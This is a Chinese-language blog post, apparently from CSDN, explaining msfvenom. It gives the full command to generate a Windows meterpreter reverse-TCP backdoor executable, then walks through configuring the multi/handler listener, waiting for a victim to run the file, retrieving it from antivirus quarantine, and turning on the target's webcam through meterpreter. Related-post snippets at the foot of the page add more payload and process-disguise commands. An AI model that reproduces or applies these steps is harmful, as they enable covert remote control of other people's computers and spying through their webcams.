msfvenom的使用

已于 2023-06-01 15:55:07 修改
阅读量477 收藏 4
点赞数 1
分类专栏: 网络安全 文章标签: 玩游戏 网络安全
于 2023-06-01 14:52:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A_Z_dd/article/details/130988154
版权

建立后门及应用

msfvenom -p windows/x64/meterpreter_revers_tcp (攻击的是windows系统(可以理解为攻击载荷),下方配置msf模块要与该处一致)

lhost=192.168.234.128 (kali的IP地址)

lport=9999 (端口,随意,只要不被占用即可(注意!!!下方配置msf模块要与该处一致))

-f exe -o demo9999.exe(生成的是exe文件)

(1.)生成病毒(放到本机 会被杀毒软件删除)

(2.)进入msfconsole

若有疑问请看http://t.csdn.cn/i5rWX

1.使用模块

use exploit/multi/handler

查看配置是否完善 使用命令show options

说明:

Payload options 这一大栏代表攻击载荷的设置,如图所示此时攻击载荷是generic/shell_reverse_tcp ,因为与我们要攻击的不一致,说明该攻击载荷是错误的,需要修改成我们攻击的(生成木马也就是后门的时候用的是什么改成什么即可)

2.配置模块

设置Payload(更改为正确的攻击载荷)

配置LHOST(kali的ip地址)、LPORT(kali的端口)

3.运行模块

run

接下来就是等待有人点击刚开生成的后门程序了

自我测试:

1.将生成的后门程序复制到本地文件夹去,这时杀毒软件会提醒将其杀掉,在查毒软件的隔离区中,找到生成的后门程序,提取到本地文件夹中

2.双击运行该后门程序,在kali中便会先显示有鱼儿上钩了,跳转到meterpreter拿到权限

3.help查看权限,列出可以做的指令

4.比如下方打开摄像头

(1)首先看是否有摄像头输入命令webcam_list

(2)以打开视频为例子 输入命令webcam_stream

会有弹出火狐浏览器,该黑屏就是摄像头的视频画面

退出按CTRL+c

(记得玩完在本地的运行管理器中结束该后门程序的任务)

这里是阿政
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
记一次msf入侵win10,并拍照
weixin_30765577的博客
05-18 2806
好久没有玩kali了,刚才看到一位大佬msf渗透win10的思路,我感觉不错,我就来复现一下 kali :192.168.45.136 win10 : 192.168.45.137 1 首先,我们查看一下kali的ip 2 生成远控马儿 最后跟着生成马儿的路径 msfvenom -platform windows -p windows/m...
MSF常用命令
L_lemo004的博客
10-20 2541
Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。 Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。 Msfconsole 开启msf Msfconsole -h 协助选择项 Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数 控制模块详细介绍: Exploits 渗入进攻控制模块 主要用于进攻方式 Auxiliary 輔助控制模块 主要用于信息内容搜集 Payloa
msf命令
qq_52469895的博客
05-19 2096
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
Kali利用msf渗透Windows电脑(超详细)
最新发布
jennycisp的博客
02-27 1698
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
msfvenom 摄像头
weixin_30448603的博客
04-13 430
4.13 莫名其妙的心情不好 又回到了那个不想打游戏不想聊天不想说话的日子。 不用想。vm——>kali 很早以前看过用msfvenom生成木马的文章。然后……然后我的浏览器就崩溃了。Firefox。只好用回edge。 然后。。看到了小时候的照片,从小到大。真的是不知不觉。18了就。 由于是在空间和博客同时发表。其实也没什么所谓了。各位社工大佬因该也看不上这张模糊的 。...
msfvenom常见的使用命令
路baby的博客
06-24 2582
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线...
木马程序攻击+利用Windows内核漏洞提权
m0_71745258的博客
01-22 2760
再次声明,此学习路线主打就业方向,如果只是感兴趣,想成为什么黑客的朋友可以划走了!网络安全≠黑客很多人上来就说想做想入行网络安全,但是连方向都没搞清楚就开始学习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要学习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇,主要是针对网络渗透方向,其他方向仅供参考,学习路线并不完全一样,有机会的话我再单独梳理。
网络攻防作业——Msfvenom使用
yyy7654321的博客
06-28 2109
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
msfconsole的使用,MSF17-010(虚拟机)的实验
weixin_52371314的博客
03-16 896
宿主机kali:IP地址靶机win7:IP地址然后关闭靶机防火墙,将kali,和win7的网络模式更改为NAT模式,然后使用宿主机和靶机ping对方的机器,保证ping通.
Msfvenom使用
Beret-81的博客
03-12 993
目录1、初识 Msfvenom2、Msfvenom 使用3、Msfvenom 例子Msfvenom 生成 elf 文件4、Msfvenom 生成各种 Payload 1、初识 Msfvenom Msfvenom是Metasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。 2、Msfvenom 使用 语法: Msfvenom -p lhost= lpor...
msfvenom基本使用
02-24
msfvenom常用的一些后门总结
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行...
AUTO-db:AUTO-db是一个Python脚本,可自动执行许多工具-nmap,使用apache2和python进行文件传输,使用ssh和msfvenom后门进行远程连接,enum4linux,nikto,dirbuster,gobuster,oscanner,wpscan,nmapAutomator和autorecon
03-26
自动数据库AUTO-db是一个Python脚本,可自动执行许多工具-nmap,使用apache2和python进行文件传输,使用ssh和msfvenom后门进行远程连接,enum4linux,nikto,dirbuster,gobuster,oscanner,wpscan,nmapAutomator...
malicious-wordpress-plugin:只需生成一个wordpress插件,即可在上传后为您提供反向外壳。 我建议安装Kali Linux,因为msfvenom用于生成有效负载
05-01
我建议安装Kali Linux,因为MSFvenom用于生成有效负载。 不用说,为了使此方法有效,您必须具有有效用户帐户的凭据,并且有权向WordPress网站添加插件;) 使用范例 root@wetw0rk: ~ # python wordpwn.py __ __ _ \...
MSF使用教程
qq_45317844的博客
07-12 1327
run autoroute -s 192.168.159.0/24 #添加到目标环境网络,当你相连接一个网络发现不通的时候,可以设置一个路由试试,一般网络中没有设置围栏的情况下,是可以通的。-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload。timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt。
使用kali渗透工具msfvenom生成远控木马
m0_74981852的博客
06-04 2422
在杀毒软件中可以找回文件并信任改文件。右键复制到自己的电脑的一个位置,注意。1.打开kali终端>输入。2.1查看生成的后门文件。6.对目标主机进行攻击。运行之后,去目标主机。
msfvenom 实现多态技术的使用方法
05-31
下面是使用 msfvenom 实现多态技术的基本步骤: 1. 生成 payload:首先需要使用 msfvenom 生成一个 payload,例如 Windows 反向 Meterpreter shell: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这里是阿政

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值